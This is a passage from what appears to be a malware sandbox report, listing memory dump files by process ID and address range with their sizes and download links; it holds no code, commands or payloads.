                              • memory/4352-279-0x00000000025C0000-0x00000000025C9000-memory.dmp
                                Filesize

                                36KB

                                Download
                              • memory/4352-270-0x0000000000000000-mapping.dmp
                                Download
                              • memory/4424-614-0x0000000000000000-mapping.dmp
                                Download
                              • memory/4448-626-0x0000000000000000-mapping.dmp
                                Download
                              • memory/4480-325-0x000000007E940000-0x000000007E941000-memory.dmp
                                Filesize

                                4KB

                                Download
                              • memory/4480-289-0x0000000000000000-mapping.dmp
                                Download
                              • memory/4480-299-0x0000000004B32000-0x0000000004B33000-memory.dmp
                                Filesize

                                4KB

                                Download
                              • memory/4480-350-0x0000000004B33000-0x0000000004B34000-memory.dmp
                                Filesize

                                4KB

                                Download
                              • memory/4480-298-0x0000000004B30000-0x0000000004B31000-memory.dmp
                                Filesize

                                4KB

                                Download
                              • memory/4524-628-0x0000000000000000-mapping.dmp
                                Download
                              • memory/4568-638-0x0000000000000000-mapping.dmp
                                Download
                              • memory/4592-630-0x0000000000000000-mapping.dmp
                                Download
                              • memory/4632-640-0x0000000000000000-mapping.dmp
                                Download
                              • memory/4648-305-0x000000000044003F-mapping.dmp
                                Download
                              • memory/4648-324-0x0000000000400000-0x0000000000495000-memory.dmp
                                Filesize

                                596KB

                                Download
                              • memory/4688-646-0x0000000000000000-mapping.dmp
                                Download
                              • memory/4708-654-0x0000000000000000-mapping.dmp
                                Download
                              • memory/4712-553-0x0000000000000000-mapping.dmp
                                Download
                              • memory/4728-555-0x0000000000000000-mapping.dmp
                                Download
                              • memory/4728-573-0x0000000005830000-0x0000000005D2E000-memory.dmp
                                Filesize

                                5.0MB

                                Download
                              • memory/4764-656-0x0000000000000000-mapping.dmp
                                Download
                              • memory/4804-567-0x0000000000000000-mapping.dmp
                                Download
                              • memory/4804-633-0x000001D4995F0000-0x000001D499610000-memory.dmp
                                Filesize

                                128KB

                                Download
                              • memory/4804-632-0x000001D499630000-0x000001D499650000-memory.dmp
                                Filesize

                                128KB

                                Download
                              • memory/4804-582-0x00007FFD30020000-0x00007FFD30022000-memory.dmp
                                Filesize

                                8KB

                                Download
                              • memory/4804-593-0x000001D4995D0000-0x000001D4995F0000-memory.dmp
                                Filesize

                                128KB

                                Download
                              • memory/4820-569-0x0000000000000000-mapping.dmp
                                Download
                              • memory/4872-671-0x0000000005650000-0x0000000005B4E000-memory.dmp
                                Filesize

                                5.0MB

                                Download
                              • memory/4872-662-0x000000000047B92E-mapping.dmp
                                Download
                              • memory/4884-576-0x0000000000000000-mapping.dmp
                                Download
                              • memory/4916-668-0x0000000000000000-mapping.dmp
                                Download
                              • memory/5012-583-0x0000000000000000-mapping.dmp
                                Download
                              • memory/5076-672-0x0000000000000000-mapping.dmp
                                Download
                              • memory/5108-587-0x0000000000000000-mapping.dmp
                                Download